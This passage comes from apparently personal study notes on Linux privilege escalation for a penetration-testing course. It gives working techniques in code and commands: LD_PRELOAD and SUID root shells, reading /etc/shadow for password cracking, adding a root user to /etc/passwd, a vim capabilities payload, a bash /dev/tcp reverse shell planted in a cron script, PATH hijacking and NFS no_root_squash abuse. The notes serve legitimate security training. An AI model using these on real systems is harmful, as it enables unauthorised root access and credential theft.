style="color:#393A34">(</span><span class="token punctuation" style="color:#393A34">)</span><span class="token plain"> </span><span class="token punctuation" style="color:#393A34">{</span><span class="token plain">  </span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token function" style="color:#d73a49">unsetenv</span><span class="token punctuation" style="color:#393A34">(</span><span class="token string" style="color:#e3116c">&quot;LD_PRELOAD&quot;</span><span class="token punctuation" style="color:#393A34">)</span><span class="token punctuation" style="color:#393A34">;</span><span class="token plain">  </span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token function" style="color:#d73a49">setgid</span><span class="token punctuation" style="color:#393A34">(</span><span class="token number" style="color:#36acaa">0</span><span class="token punctuation" style="color:#393A34">)</span><span class="token punctuation" style="color:#393A34">;</span><span class="token plain">  </span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token function" style="color:#d73a49">setuid</span><span class="token punctuation" style="color:#393A34">(</span><span class="token number" style="color:#36acaa">0</span><span class="token punctuation" style="color:#393A34">)</span><span class="token punctuation" style="color:#393A34">;</span><span class="token plain">  </span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token function" style="color:#d73a49">system</span><span class="token punctuation" style="color:#393A34">(</span><span class="token string" style="color:#e3116c">&quot;/bin/bash&quot;</span><span class="token punctuation" style="color:#393A34">)</span><span class="token punctuation" style="color:#393A34">;</span><span class="token plain">  </span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token punctuation" style="color:#393A34">}</span><span class="token plain">  </span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>We can save this code as shell.c and compile it using gcc into a shared object file using the following parameters
<code>gcc -fPIC -shared -o shell.so shell.c -nostartfiles</code></p>
<p>We can now use this shared object file when launching any program our user can run with sudo. In our case, Apache2, find, or almost any of the programs we can run with sudo can be used.</p>
<p>We need to run the program by specifying the LD_PRELOAD option, as follows
<code>sudo LD_PRELOAD=/home/user/ldpreload/shell.so find</code></p>
<p>This will result in a shell spawn with root privileges.</p>
<h1>SUID</h1>
<p>Much of Linux privilege controls rely on controlling the users and files interactions. This is done with permissions. By now, you know that files can have read, write, and execute permissions. These are given to users within their privilege levels. This changes with SUID (Set-user Identification) and SGID (Set-group Identification). These allow files to be executed with the permission level of the file owner or the group owner, respectively.</p>
<p>You will notice these files have an “s” bit set showing their special permission level.</p>
<p><code>find / -type f -perm -04000 -ls 2&gt;/dev/null</code> will list files that have SUID or SGID bits set.</p>
<p>A good practice would be to compare executables on this list with GTFOBins (<a href="https://gtfobins.github.io/" target="_blank" rel="noopener noreferrer">https://gtfobins.github.io</a>). Clicking on the SUID button will filter binaries known to be exploitable when the SUID bit is set (you can also use this link for a pre-filtered list <a href="https://gtfobins.github.io/#+suid" target="_blank" rel="noopener noreferrer">https://gtfobins.github.io/#+suid</a>).</p>
<p>The list above shows that nano has the SUID bit set. Unfortunately, GTFObins does not provide us with an easy win. Typical to real-life privilege escalation scenarios, we will need to find intermediate steps that will help us leverage whatever minuscule finding we have.</p>
<p>The SUID bit set for the nano text editor allows us to create, edit and read files using the file owner’s privilege. Nano is owned by root, which probably means that we can read and edit files at a higher privilege level than our current user has. At this stage, we have two basic options for privilege escalation: reading the <code>/etc/shadow</code> file or adding our user to <code>/etc/passwd</code>.</p>
<p>Below are simple steps using both vectors.</p>
<p>reading the <code>/etc/shadow</code> file</p>
<p>We see that the nano text editor has the SUID bit set by running the <code>find / -type f -perm -04000 -ls 2&gt;/dev/null</code> command.</p>
<p><code>nano /etc/shadow</code> will print the contents of the <code>/etc/shadow</code> file. We can now use the unshadow tool to create a file crackable by John the Ripper. To achieve this, unshadow needs both the <code>/etc/shadow</code> and <code>/etc/passwd</code> files.</p>
<p>The unshadow tool’s usage can be seen below
<code>unshadow passwd.txt shadow.txt &gt; passwords.txt</code></p>
<p>With the correct wordlist and a little luck, John the Ripper can return one or several passwords in cleartext.</p>
<p>The other option would be to add a new user that has root privileges. This would help us circumvent the tedious process of password cracking. Below is an easy way to do it</p>
<p>We will need the hash value of the password we want the new user to have. This can be done quickly using the openssl tool on Kali Linux.
<code>openssl passwd -1 -salt THM passwd1</code></p>
<p>We will then add this password with a username to the <code>/etc/passwd</code> file.</p>
<p>Once our user is added (please note how <code>root:/bin/bash</code> was used to provide a root shell) we will need to switch to this user and hopefully should have root privileges.</p>
<h1>Capabilities</h1>
<p>Another method system administrators can use to increase the privilege level of a process or binary is “Capabilities”. Capabilities help manage privileges at a more granular level. For example, if the SOC analyst needs to use a tool that needs to initiate socket connections, a regular user would not be able to do that. If the system administrator does not want to give this user higher privileges, they can change the capabilities of the binary. As a result, the binary would get through its task without needing a higher privilege user.<br>
<!-- -->The capabilities man page provides detailed information on its usage and options.</p>
<p>We can use the <code>getcap</code> tool to list enabled capabilities.</p>
<p>When run as an unprivileged user, <code>getcap -r /</code> will generate a huge amount of errors, so it is good practice to redirect the error messages to /dev/null.</p>
<p>Please note that neither vim nor its copy has the SUID bit set. This privilege escalation vector is therefore not discoverable when enumerating files looking for SUID.</p>
<p>GTFObins has a good list of binaries that can be leveraged for privilege escalation if we find any set capabilities.</p>
<p>We notice that vim can be used with the following command and payload</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">./vim -c &#x27;:py3 import os; os.setuid(0); os.execl(&quot;/bin/sh&quot;, &quot;sh&quot;, &quot;-c&quot;,&quot;reset; exec sh&quot;)&#x27;</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>This will launch a root shell.</p>
<h1>Cron Jobs</h1>
<p>Cron jobs are used to run scripts or binaries at specific times. By default, they run with the privilege of their owners and not the current user. While properly configured cron jobs are not inherently vulnerable, they can provide a privilege escalation vector under some conditions.<br>
<!-- -->The idea is quite simple; if there is a scheduled task that runs with root privileges and we can change the script that will be run, then our script will run with root privileges.</p>
<p>Cron job configurations are stored as crontabs (cron tables) to see the next time and date the task will run.</p>
<p>Each user on the system have their crontab file and can run specific tasks whether they are logged in or not. As you can expect, our goal will be to find a cron job set by root and have it run our script, ideally a shell.</p>
<p>Any user can read the file keeping system-wide cron jobs under <code>/etc/crontab</code></p>
<p>While CTF machines can have cron jobs running every minute or every 5 minutes, you will more often see tasks that run daily, weekly or monthly in penetration test engagements.</p>
<p>You can see the <code>backup.sh</code> script was configured to run every minute. The content of the file shows a simple script that creates a backup of the file.</p>
<p>As our current user can access this script, we can easily modify it to create a reverse shell, hopefully with root privileges.</p>
<p>The script will use the tools available on the target system to launch a reverse shell.<br>
<!-- -->Two points to note</p>
<ol>
<li>The command syntax will vary depending on the available tools. (e.g. <code>nc</code> will probably not support the <code>-e</code> option you may have seen used in other cases)</li>
<li>We should always prefer to start reverse shells, as we not want to compromise the system integrity during a real penetration testing engagement.</li>
</ol>
<p>The file should look like this</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">#! /bin/bash</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">bash -i &gt;&amp; /dev/tcp/10.0.2.15/6666 0&gt;&amp;1</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>We will now run a listener on our attacking machine to receive the incoming connection.</p>
<p>Crontab is always worth checking as it can sometimes lead to easy privilege escalation vectors. The following scenario is not uncommon in companies that do not have a certain cyber security maturity level</p>
<ol>
<li>System administrators need to run a script at regular intervals.</li>
<li>They create a cron job to do this</li>
<li>After a while, the script becomes useless, and they delete it</li>
<li>They do not clean the relevant cron job</li>
</ol>
<p>This change management issue leads to a potential exploit leveraging cron jobs.</p>
<p>If the script was deleted, but the cron job still exists.</p>
<p>If the full path of the script is not defined (as it was done for the backup.sh script), cron will refer to the paths listed under the PATH variable in the /etc/crontab file. In this case, we should be able to create a script named “xxx.sh” under our user’s home folder and it should be run by the cron job.</p>
<p>In the odd event you find an existing script or task attached to a cron job, it is always worth spending time to understand the function of the script and how any tool is used within the context. For example, tar, 7z, rsync, etc., can be exploited using their wildcard feature.</p>
<h1>PATH</h1>
<p>If a folder for which your user has write permission is located in the path, you could potentially hijack an application to run a script. PATH in Linux is an environmental variable that tells the operating system where to search for executables. For any command that is not built into the shell or that is not defined with an absolute path, Linux will start searching in folders defined under PATH. (PATH is the environmental variable we&#x27;re talking about here, path is the location of a file).</p>
<ol>
<li>What folders are located under $PATH</li>
<li>Does your current user have write privileges for any of these folders?</li>
<li>Can you modify $PATH?</li>
<li>Is there a script/application you can start that will be affected by this vulnerability?</li>
</ol>
<p>For example, we have a script</p>
<div class="language-c codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-c codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token macro property directive-hash" style="color:#36acaa">#</span><span class="token macro property directive keyword" style="color:#00009f">include</span><span class="token macro property" style="color:#36acaa"> </span><span class="token macro property string" style="color:#e3116c">&lt;unistd.h&gt;</span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token keyword" style="color:#00009f">void</span><span class="token plain"> </span><span class="token function" style="color:#d73a49">main</span><span class="token punctuation" style="color:#393A34">(</span><span class="token punctuation" style="color:#393A34">)</span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token punctuation" style="color:#393A34">{</span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token function" style="color:#d73a49">setuid</span><span class="token punctuation" style="color:#393A34">(</span><span class="token number" style="color:#36acaa">0</span><span class="token punctuation" style="color:#393A34">)</span><span class="token punctuation" style="color:#393A34">;</span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token function" style="color:#d73a49">setgid</span><span class="token punctuation" style="color:#393A34">(</span><span class="token number" style="color:#36acaa">0</span><span class="token punctuation" style="color:#393A34">)</span><span class="token punctuation" style="color:#393A34">;</span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token function" style="color:#d73a49">system</span><span class="token punctuation" style="color:#393A34">(</span><span class="token string" style="color:#e3116c">&quot;PROGRAM_NAME&quot;</span><span class="token punctuation" style="color:#393A34">)</span><span class="token punctuation" style="color:#393A34">;</span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token punctuation" style="color:#393A34">}</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>This script tries to launch a system binary called “PROGRAM_NAME” but the example can easily be replicated with any binary.</p>
<p>We compile this into an executable and set the SUID bit.</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">gcc path_xp.c -o path -w</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">chmod u+s path</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>Our user now has access to the “path” script with SUID bit set.</p>
<p>Once executed “path” will look for an executable named “PROGRAM_NAME” inside folders listed under PATH.</p>
<p>If any writable folder is listed under PATH we could create a binary named PROGRAM_NAME under that directory and have our “path” script run it. As the SUID bit is set, this binary will run with root privilege.</p>
<p>A simple search for writable folders can done using the “<code>find / -writable 2&gt;/dev/null</code>” command. The output of this command can be cleaned using a simple cut and sort sequence.</p>
<p>Some CTF scenarios can present different folders but a regular system would output something different.</p>
<p>We see a number of folders under /usr, thus it could be easier to run our writable folder search once more to cover subfolders.</p>
<p>An alternative could be the command below.
<code>find / -writable 2&gt;/dev/null | cut -d &quot;/&quot; -f 2,3 | grep -v proc | sort -u</code></p>
<p>We have added “grep -v proc” to get rid of the many results related to running processes.</p>
<p>Unfortunately, subfolders under /usr are not writable</p>
<p>The folder that will be easier to write to is probably /tmp. At this point because /tmp is not present in PATH so we will need to add it. The “<code>export PATH=/tmp:$PATH</code>” command accomplishes this.</p>
<p>At this point the path script will also look under the /tmp folder for an executable named “PROGRAM_NAME”.</p>
<p>Creating this command is fairly easy by copying /bin/bash as “PROGRAM_NAME” under the /tmp folder.</p>
<p>We have given executable rights to our copy of /bin/bash, please note that at this point it will run with our user’s right. What makes a privilege escalation possible within this context is that the path script runs with root privileges.</p>
<h1>NFS</h1>
<p>Privilege escalation vectors are not confined to internal access. Shared folders and remote management interfaces such as SSH and Telnet can also help you gain root access on the target system. Some cases will also require using both vectors, e.g. finding a root SSH private key on the target system and connecting via SSH with root privileges instead of trying to increase your current user’s privilege level.</p>
<p>Another vector that is more relevant to CTFs and exams is a misconfigured network shell. This vector can sometimes be seen during penetration testing engagements when a network backup system is present.</p>
<p>NFS (Network File Sharing) configuration is kept in the /etc/exports file. This file is created during the NFS server installation and can usually be read by users.</p>
<p>The critical element for this privilege escalation vector is the “no_root_squash” option. By default, NFS will change the root user to nfsnobody and strip any file from operating with root privileges. If the “no_root_squash” option is present on a writable share, we can create an executable with SUID bit set and run it on the target system.</p>
<p>We will start by enumerating mountable shares from our attacking machine.
<code>showmount -e IP</code></p>
<p>We will mount one of the “no_root_squash” shares to our attacking machine and start building our executable.
<code>mount -o rw IP:/backups /tmp/backupsonattackermachine</code></p>
<p>As we can set SUID bits, a simple executable that will run /bin/bash on the target system will do the job.</p>
<div class="language-c codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-c codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token keyword" style="color:#00009f">int</span><span class="token plain"> </span><span class="token function" style="color:#d73a49">main</span><span class="token punctuation" style="color:#393A34">(</span><span class="token punctuation" style="color:#393A34">)</span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token punctuation" style="color:#393A34">{</span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token function" style="color:#d73a49">setgid</span><span class="token punctuation" style="color:#393A34">(</span><span class="token number" style="color:#36acaa">0</span><span class="token punctuation" style="color:#393A34">)</span><span class="token punctuation" style="color:#393A34">;</span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token function" style="color:#d73a49">setuid</span><span class="token punctuation" style="color:#393A34">(</span><span class="token number" style="color:#36acaa">0</span><span class="token punctuation" style="color:#393A34">)</span><span class="token punctuation" style="color:#393A34">;</span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token function" style="color:#d73a49">system</span><span class="token punctuation" style="color:#393A34">(</span><span class="token string" style="color:#e3116c">&quot;/bin/bash&quot;</span><span class="token punctuation" style="color:#393A34">)</span><span class="token punctuation" style="color:#393A34">;</span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token keyword" style="color:#00009f">return</span><span class="token plain"> </span><span class="token number" style="color:#36acaa">0</span><span class="token punctuation" style="color:#393A34">;</span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token punctuation" style="color:#393A34">}</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>Once we compile the code we will set the SUID bit.</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">gcc nfs.c -o nfs -w</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">chmod +s nfs</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>You will that both files (nfs.c and nfs are present on the target system. We have worked on the mounted share so there was no need to transfer them).</p>
<p>You will that both files (nfs.c and nfs are present on the target system. We have worked on the mounted share so there was no need to transfer them).</p></div></article><nav class="pagination-nav docusaurus-mt-lg" aria-label="Docs pages"><a class="pagination-nav__link pagination-nav__link--prev" href="/docs/Jr Penetration Tester/Metasploit/Meterpreter"><div class="pagination-nav__sublabel">Previous</div><div class="pagination-nav__label">Meterpreter</div></a><a class="pagination-nav__link pagination-nav__link--next" href="/docs/Jr Penetration Tester/Privilege Escalation/What the Shell"><div class="pagination-nav__sublabel">Next</div><div class="pagination-nav__label">What the Shell</div></a></nav></div></div><div class="col col--3"><div class="tableOfContents_bqdL thin-scrollbar theme-doc-toc-desktop"><ul class="table-of-contents table-of-contents__left-border"><li><a href="#hostname" class="table-of-contents__link toc-highlight">hostname</a></li><li><a href="#uname--a" class="table-of-contents__link toc-highlight">uname -a</a></li><li><a href="#procversion" class="table-of-contents__link toc-highlight">/proc/version</a></li><li><a href="#etcissue" class="table-of-contents__link toc-highlight">/etc/issue</a></li><li><a href="#ps-command" class="table-of-contents__link toc-highlight">ps Command</a></li><li><a href="#env" class="table-of-contents__link toc-highlight">env</a></li><li><a href="#sudo--l" class="table-of-contents__link toc-highlight">sudo -l</a></li><li><a href="#ls" class="table-of-contents__link toc-highlight">ls</a></li><li><a href="#id" class="table-of-contents__link toc-highlight">Id</a></li><li><a href="#etcpasswd" class="table-of-contents__link toc-highlight">/etc/passwd</a></li><li><a href="#history" class="table-of-contents__link toc-highlight">history</a></li><li><a href="#ifconfig" class="table-of-contents__link toc-highlight">ifconfig</a></li><li><a href="#netstat" class="table-of-contents__link toc-highlight">netstat</a></li><li><a href="#find-command" class="table-of-contents__link toc-highlight">find Command</a></li><li><a href="#general-linux-commands" class="table-of-contents__link toc-highlight">General Linux Commands</a></li></ul></div></div></div></div></main></div></div></div><footer class="footer footer--dark"><div class="container container-fluid"><div class="footer__bottom text--center"><div class="footer__copyright">Copyright © 2024 Gabriel@pochacco.top</div></div></div></footer></div>
</body>
</html>